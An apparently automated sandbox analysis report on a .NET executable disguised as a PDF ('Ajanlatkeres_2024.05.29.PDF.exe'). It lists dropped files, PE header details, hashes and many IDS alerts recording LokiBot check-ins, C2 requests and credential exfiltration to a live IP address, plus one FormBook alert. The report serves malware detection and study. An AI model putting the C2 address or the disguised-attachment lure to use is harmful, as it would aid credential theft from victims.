                                            MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                            SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                            SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                            SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                            Malicious:false
                                            Preview:# PowerShell test file to determine AppLocker lockdown mode
                                            Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                            File Type:ASCII text, with no line terminators
                                            Category:dropped
                                            Size (bytes):60
                                            Entropy (8bit):4.038920595031593
                                            Encrypted:false
                                            SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                            MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                            SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                            SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                            SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                            Malicious:false
                                            Preview:# PowerShell test file to determine AppLocker lockdown mode
                                            Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                            File Type:ASCII text, with no line terminators
                                            Category:dropped
                                            Size (bytes):60
                                            Entropy (8bit):4.038920595031593
                                            Encrypted:false
                                            SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                            MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                            SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                            SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                            SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                            Malicious:false
                                            Preview:# PowerShell test file to determine AppLocker lockdown mode
                                            Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                            File Type:ASCII text, with no line terminators
                                            Category:dropped
                                            Size (bytes):60
                                            Entropy (8bit):4.038920595031593
                                            Encrypted:false
                                            SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                            MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                            SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                            SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                            SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                            Malicious:false
                                            Preview:# PowerShell test file to determine AppLocker lockdown mode
                                            Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                            File Type:ASCII text, with no line terminators
                                            Category:dropped
                                            Size (bytes):60
                                            Entropy (8bit):4.038920595031593
                                            Encrypted:false
                                            SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                            MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                            SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                            SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                            SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                            Malicious:false
                                            Preview:# PowerShell test file to determine AppLocker lockdown mode
                                            Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                            File Type:ASCII text, with no line terminators
                                            Category:dropped
                                            Size (bytes):60
                                            Entropy (8bit):4.038920595031593
                                            Encrypted:false
                                            SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                            MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                            SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                            SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                            SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                            Malicious:false
                                            Preview:# PowerShell test file to determine AppLocker lockdown mode
                                            Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                            File Type:ASCII text, with no line terminators
                                            Category:dropped
                                            Size (bytes):60
                                            Entropy (8bit):4.038920595031593
                                            Encrypted:false
                                            SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                            MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                            SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                            SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                            SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                            Malicious:false
                                            Preview:# PowerShell test file to determine AppLocker lockdown mode
                                            Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                            File Type:ASCII text, with no line terminators
                                            Category:dropped
                                            Size (bytes):60
                                            Entropy (8bit):4.038920595031593
                                            Encrypted:false
                                            SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                            MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                            SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                            SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                            SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                            Malicious:false
                                            Preview:# PowerShell test file to determine AppLocker lockdown mode
                                            Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
                                            File Type:very short file (no magic)
                                            Category:dropped
                                            Size (bytes):1
                                            Entropy (8bit):0.0
                                            Encrypted:false
                                            SSDEEP:3:U:U
                                            MD5:C4CA4238A0B923820DCC509A6F75849B
                                            SHA1:356A192B7913B04C54574D18C28D46E6395428AB
                                            SHA-256:6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B
                                            SHA-512:4DFF4EA340F0A823F15D3F4F01AB62EAE0E5DA579CCB851F8DB9DFE84C58B2B37B89903A740E1EE172DA793A6E79D560E5F7F9BD058A12A280433ED6FA46510A
                                            Malicious:false
                                            Preview:1
                                            Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
                                            File Type:data
                                            Category:dropped
                                            Size (bytes):45
                                            Entropy (8bit):0.9111711733157262
                                            Encrypted:false
                                            SSDEEP:3:/lwltJ:Wz
                                            MD5:3D7D230E8E9B4E8202935E38050E13E5
                                            SHA1:DFABCB8DCBC48AB136F6F87A29BF4A7C9CCCCAAF
                                            SHA-256:269E9F79960D5201DA265CEF43575B1EF31644174DA7A9AB23501AD3A0CACFC3
                                            SHA-512:02BAF2F6CE0222EBFD4186641AC8F8BF8C54D0184A6C4C85F720171EEF8B1871ACCC9F3E522B80C8814428F52B007CE321312A76B4538D59E4A436D43011FF30
                                            Malicious:false
                                            Preview:........................................user.
                                            File type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                            Entropy (8bit):7.950308586261336
                                            TrID:
                                            • Win32 Executable (generic) Net Framework (10011505/4) 49.83%
                                            • Win32 Executable (generic) a (10002005/4) 49.78%
                                            • Generic CIL Executable (.NET, Mono, etc.) (73296/58) 0.36%
                                            • Generic Win/DOS Executable (2004/3) 0.01%
                                            • DOS Executable Generic (2002/1) 0.01%
                                            File name:Ajanlatkeres_2024.05.29.PDF.exe
                                            File size:524'288 bytes
                                            MD5:cff39149d540e851536383f64d5f5568
                                            SHA1:2cd49c6f28ecea254e22a75e3e77092a67d26774
                                            SHA256:795af0703ab2ab7cfcfcc38449e7da1a20967be437e5877ee27da317b3991357
                                            SHA512:0f3eb77eb9396ec5ec63fc166e12167bf651e433b5c7831935ed2c965eed85b94b9893e6d20d207473f126b273f60c4b6378859b85613cc630acd7c7b70a6ba6
                                            SSDEEP:12288:UidJS4V9ulMb8Z6j2B0TM4kQhrLO9rAq7BH7Q4a2Y4tS87W:5ScN4ZsvTM4DhXfIBUa17W
                                            TLSH:16B4121127D4C799C4BD97B22C2270A1C7317A202569FE2C9EE2418A1A2E7855F72F7E
                                            File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L.....Vf..............0.............V.... ... ....@.. .......................`............@................................
                                            Icon Hash:62ceac86b2968ea2
                                            Entrypoint:0x480756
                                            Entrypoint Section:.text
                                            Digitally signed:false
                                            Imagebase:0x400000
                                            Subsystem:windows gui
                                            Image File Characteristics:EXECUTABLE_IMAGE, 32BIT_MACHINE
                                            DLL Characteristics:DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
                                            Time Stamp:0x6656F290 [Wed May 29 09:17:04 2024 UTC]
                                            TLS Callbacks:
                                            CLR (.Net) Version:
                                            OS Version Major:4
                                            OS Version Minor:0
                                            File Version Major:4
                                            File Version Minor:0
                                            Subsystem Version Major:4
                                            Subsystem Version Minor:0
                                            Import Hash:f34d5f2d4577ed6d9ceec516c1f5a744
                                            Instruction
                                            jmp dword ptr [00402000h]
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            NameVirtual AddressVirtual Size Is in Section
                                            IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                                            IMAGE_DIRECTORY_ENTRY_IMPORT0x807010x4f.text
                                            IMAGE_DIRECTORY_ENTRY_RESOURCE0x820000x13dc.rsrc
                                            IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                                            IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
                                            IMAGE_DIRECTORY_ENTRY_BASERELOC0x840000xc.reloc
                                            IMAGE_DIRECTORY_ENTRY_DEBUG0x7e8d00x54.text
                                            IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                                            IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                                            IMAGE_DIRECTORY_ENTRY_TLS0x00x0
                                            IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x00x0
                                            IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                                            IMAGE_DIRECTORY_ENTRY_IAT0x20000x8.text
                                            IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                                            IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x20080x48.text
                                            IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0
                                            NameVirtual AddressVirtual SizeRaw SizeMD5Xored PEZLIB ComplexityFile TypeEntropyCharacteristics
                                            .text0x20000x7e75c0x7e800eacdc5859d29c2f62e1cf9e6b45f8951False0.95995321763834data7.9600603885333365IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                                            .rsrc0x820000x13dc0x14008301550034ba726d731af7d0a56ae498False0.33671875data4.897116852731504IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                            .reloc0x840000xc0x200c3bb697572015bdcaeb3886c6309e90cFalse0.044921875data0.08153941234324169IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ
                                            NameRVASizeTypeLanguageCountryZLIB Complexity
                                            RT_ICON0x821300xda8Device independent bitmap graphic, 26 x 64 x 32, image size 33280.2823226544622426
                                            RT_GROUP_ICON0x82ed80x14data1.1
                                            RT_VERSION0x82eec0x304data0.43134715025906734
                                            RT_MANIFEST0x831f00x1eaXML 1.0 document, Unicode text, UTF-8 (with BOM) text, with CRLF line terminators0.5489795918367347
                                            DLLImport
                                            mscoree.dll_CorExeMain
                                            TimestampProtocolSIDMessageSource PortDest PortSource IPDest IP
                                            05/29/24-15:42:47.538291TCP2025381ET TROJAN LokiBot Checkin4972880192.168.2.945.61.137.215
                                            05/29/24-15:42:52.927476TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24973080192.168.2.945.61.137.215
                                            05/29/24-15:43:28.214472TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14974580192.168.2.945.61.137.215
                                            05/29/24-15:45:23.375856TCP2025381ET TROJAN LokiBot Checkin4978980192.168.2.945.61.137.215
                                            05/29/24-15:45:28.962608TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24979180192.168.2.945.61.137.215
                                            05/29/24-15:43:22.752549TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4974280192.168.2.945.61.137.215
                                            05/29/24-15:43:28.214472TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24974580192.168.2.945.61.137.215
                                            05/29/24-15:42:52.927476TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14973080192.168.2.945.61.137.215
                                            05/29/24-15:42:55.680526TCP2025381ET TROJAN LokiBot Checkin4973180192.168.2.945.61.137.215
                                            05/29/24-15:46:10.058300TCP2025381ET TROJAN LokiBot Checkin4980880192.168.2.945.61.137.215
                                            05/29/24-15:42:36.746086TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4972480192.168.2.945.61.137.215
                                            05/29/24-15:42:10.038270TCP2024317ET TROJAN LokiBot Application/Credential Data Exfiltration Detected M24971280192.168.2.945.61.137.215
                                            05/29/24-15:44:39.311748TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24977380192.168.2.945.61.137.215
                                            05/29/24-15:43:30.801731TCP2025381ET TROJAN LokiBot Checkin4974680192.168.2.945.61.137.215
                                            05/29/24-15:44:31.132505TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4977080192.168.2.945.61.137.215
                                            05/29/24-15:46:07.455148TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24980780192.168.2.945.61.137.215
                                            05/29/24-15:42:10.038270TCP2024312ET TROJAN LokiBot Application/Credential Data Exfiltration Detected M14971280192.168.2.945.61.137.215
                                            05/29/24-15:44:39.311748TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14977380192.168.2.945.61.137.215
                                            05/29/24-15:45:20.705538TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14978880192.168.2.945.61.137.215
                                            05/29/24-15:45:59.101278TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4980480192.168.2.945.61.137.215
                                            05/29/24-15:44:25.723486TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4976780192.168.2.945.61.137.215
                                            05/29/24-15:45:20.705538TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24978880192.168.2.945.61.137.215
                                            05/29/24-15:45:09.224417TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4978580192.168.2.945.61.137.215
                                            05/29/24-15:42:20.544811TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14971780192.168.2.945.61.137.215
                                            05/29/24-15:44:17.418907TCP2025381ET TROJAN LokiBot Checkin4976480192.168.2.945.61.137.215
                                            05/29/24-15:45:28.962608TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14979180192.168.2.945.61.137.215
                                            05/29/24-15:43:46.833672TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4975280192.168.2.945.61.137.215
                                            05/29/24-15:45:50.755707TCP2025381ET TROJAN LokiBot Checkin4980180192.168.2.945.61.137.215
                                            05/29/24-15:45:48.086059TCP2025381ET TROJAN LokiBot Checkin4979980192.168.2.945.61.137.215
                                            05/29/24-15:44:58.470593TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14978180192.168.2.945.61.137.215
                                            05/29/24-15:42:20.544811TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24971780192.168.2.945.61.137.215
                                            05/29/24-15:43:20.008059TCP2025381ET TROJAN LokiBot Checkin4974180192.168.2.945.61.137.215
                                            05/29/24-15:44:44.907872TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4977580192.168.2.945.61.137.215
                                            05/29/24-15:45:31.801523TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4979380192.168.2.945.61.137.215
                                            05/29/24-15:44:14.760597TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14976380192.168.2.945.61.137.215
                                            05/29/24-15:43:06.437304TCP2025381ET TROJAN LokiBot Checkin4973680192.168.2.945.61.137.215
                                            05/29/24-15:45:45.418561TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14979880192.168.2.945.61.137.215
                                            05/29/24-15:42:31.346168TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24972280192.168.2.945.61.137.215
                                            05/29/24-15:44:00.934566TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4975780192.168.2.945.61.137.215
                                            05/29/24-15:43:01.102766TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4973480192.168.2.945.61.137.215
                                            05/29/24-15:43:17.361906TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14974080192.168.2.945.61.137.215
                                            05/29/24-15:42:17.880992TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4971680192.168.2.945.61.137.215
                                            05/29/24-15:44:14.760597TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24976380192.168.2.945.61.137.215
                                            05/29/24-15:43:17.361906TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24974080192.168.2.945.61.137.215
                                            05/29/24-15:44:58.470593TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24978180192.168.2.945.61.137.215
                                            05/29/24-15:45:45.418561TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24979880192.168.2.945.61.137.215
                                            05/29/24-15:42:31.346168TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14972280192.168.2.945.61.137.215
                                            05/29/24-15:43:14.729917TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4973980192.168.2.945.61.137.215
                                            05/29/24-15:45:53.430975TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4980280192.168.2.945.61.137.215
                                            05/29/24-15:44:12.009845TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4976280192.168.2.945.61.137.215
                                            05/29/24-15:44:27.955456TCP2031412ET TROJAN FormBook CnC Checkin (GET)4976880192.168.2.93.33.130.190
                                            05/29/24-15:45:03.852643TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14978380192.168.2.945.61.137.215
                                            05/29/24-15:44:06.434631TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4975980192.168.2.945.61.137.215
                                            05/29/24-15:44:36.658231TCP2025381ET TROJAN LokiBot Checkin4977280192.168.2.945.61.137.215
                                            05/29/24-15:44:22.948804TCP2025381ET TROJAN LokiBot Checkin4976680192.168.2.945.61.137.215
                                            05/29/24-15:45:03.852643TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24978380192.168.2.945.61.137.215
                                            05/29/24-15:44:20.226591TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4976580192.168.2.945.61.137.215
                                            05/29/24-15:43:33.478550TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14974780192.168.2.945.61.137.215
                                            05/29/24-15:43:49.526860TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14975380192.168.2.945.61.137.215
                                            05/29/24-15:43:33.478550TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24974780192.168.2.945.61.137.215
                                            05/29/24-15:45:01.201418TCP2025381ET TROJAN LokiBot Checkin4978280192.168.2.945.61.137.215
                                            05/29/24-15:42:58.351209TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4973280192.168.2.945.61.137.215
                                            05/29/24-15:43:41.466952TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24975080192.168.2.945.61.137.215
                                            05/29/24-15:43:49.526860TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24975380192.168.2.945.61.137.215
                                            05/29/24-15:45:56.184812TCP2025381ET TROJAN LokiBot Checkin4980380192.168.2.945.61.137.215
                                            05/29/24-15:45:17.857076TCP2025381ET TROJAN LokiBot Checkin4978780192.168.2.945.61.137.215
                                            05/29/24-15:42:41.960861TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4972680192.168.2.945.61.137.215
                                            05/29/24-15:43:41.466952TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14975080192.168.2.945.61.137.215
                                            05/29/24-15:43:55.212846TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14975580192.168.2.945.61.137.215
                                            05/29/24-15:42:50.288079TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4972980192.168.2.945.61.137.215
                                            05/29/24-15:42:26.177150TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24972080192.168.2.945.61.137.215
                                            05/29/24-15:45:26.168825TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4979080192.168.2.945.61.137.215
                                            05/29/24-15:45:39.931883TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14979680192.168.2.945.61.137.215
                                            05/29/24-15:42:12.652341TCP2024312ET TROJAN LokiBot Application/Credential Data Exfiltration Detected M14971480192.168.2.945.61.137.215
                                            05/29/24-15:44:09.285920TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24976180192.168.2.945.61.137.215
                                            05/29/24-15:42:12.652341TCP2024317ET TROJAN LokiBot Application/Credential Data Exfiltration Detected M24971480192.168.2.945.61.137.215
                                            05/29/24-15:43:09.282527TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4973780192.168.2.945.61.137.215
                                            05/29/24-15:43:11.942922TCP2025381ET TROJAN LokiBot Checkin4973880192.168.2.945.61.137.215
                                            05/29/24-15:43:55.212846TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24975580192.168.2.945.61.137.215
                                            05/29/24-15:46:07.455148TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4980780192.168.2.945.61.137.215
                                            05/29/24-15:44:09.285920TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14976180192.168.2.945.61.137.215
                                            05/29/24-15:44:53.150602TCP2025381ET TROJAN LokiBot Checkin4977980192.168.2.945.61.137.215
                                            05/29/24-15:45:39.931883TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24979680192.168.2.945.61.137.215
                                            05/29/24-15:42:26.177150TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14972080192.168.2.945.61.137.215
                                            05/29/24-15:42:39.353995TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24972580192.168.2.945.61.137.215
                                            05/29/24-15:42:39.353995TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14972580192.168.2.945.61.137.215
                                            05/29/24-15:44:42.013116TCP2025381ET TROJAN LokiBot Checkin4977480192.168.2.945.61.137.215
                                            05/29/24-15:43:52.300724TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4975480192.168.2.945.61.137.215
                                            05/29/24-15:45:37.356647TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4979580192.168.2.945.61.137.215
                                            05/29/24-15:45:15.181530TCP2025381ET TROJAN LokiBot Checkin4978680192.168.2.945.61.137.215
                                            05/29/24-15:45:34.630779TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24979480192.168.2.945.61.137.215
                                            05/29/24-15:45:34.630779TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14979480192.168.2.945.61.137.215
                                            05/29/24-15:44:55.765644TCP2025381ET TROJAN LokiBot Checkin4978080192.168.2.945.61.137.215
                                            05/29/24-15:45:37.356647TCP2025381ET TROJAN LokiBot Checkin4979580192.168.2.945.61.137.215
                                            05/29/24-15:42:17.880992TCP2025381ET TROJAN LokiBot Checkin4971680192.168.2.945.61.137.215
                                            05/29/24-15:42:36.746086TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24972480192.168.2.945.61.137.215
                                            05/29/24-15:45:20.705538TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4978880192.168.2.945.61.137.215
                                            05/29/24-15:42:36.746086TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14972480192.168.2.945.61.137.215
                                            05/29/24-15:45:42.784784TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4979780192.168.2.945.61.137.215
                                            05/29/24-15:44:53.150602TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4977980192.168.2.945.61.137.215
                                            05/29/24-15:42:10.038270TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4971280192.168.2.945.61.137.215
                                            05/29/24-15:42:15.295734TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14971580192.168.2.945.61.137.215
                                            05/29/24-15:43:38.811867TCP2025381ET TROJAN LokiBot Checkin4974980192.168.2.945.61.137.215
                                            05/29/24-15:45:59.101278TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24980480192.168.2.945.61.137.215
                                            05/29/24-15:44:03.719373TCP2025381ET TROJAN LokiBot Checkin4975880192.168.2.945.61.137.215
                                            05/29/24-15:42:28.740548TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4972180192.168.2.945.61.137.215
                                            05/29/24-15:42:15.295734TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24971580192.168.2.945.61.137.215
                                            05/29/24-15:44:09.285920TCP2025381ET TROJAN LokiBot Checkin4976180192.168.2.945.61.137.215
                                            05/29/24-15:45:50.755707TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4980180192.168.2.945.61.137.215
                                            05/29/24-15:45:28.962608TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4979180192.168.2.945.61.137.215
                                            05/29/24-15:45:01.201418TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4978280192.168.2.945.61.137.215
                                            05/29/24-15:44:58.470593TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4978180192.168.2.945.61.137.215
                                            05/29/24-15:44:47.749478TCP2025381ET TROJAN LokiBot Checkin4977680192.168.2.945.61.137.215
                                            05/29/24-15:43:03.791896TCP2025381ET TROJAN LokiBot Checkin4973580192.168.2.945.61.137.215
